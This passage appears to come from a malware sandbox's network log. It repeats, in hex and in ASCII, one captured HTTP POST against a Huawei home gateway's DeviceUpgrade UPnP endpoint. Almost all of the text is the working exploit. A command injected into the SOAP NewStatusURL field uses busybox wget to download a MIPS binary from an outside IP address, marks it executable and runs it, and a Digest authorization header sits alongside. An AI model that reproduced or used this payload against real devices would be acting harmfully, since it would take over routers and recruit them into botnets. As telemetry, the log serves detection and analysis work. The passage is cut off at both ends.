74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l 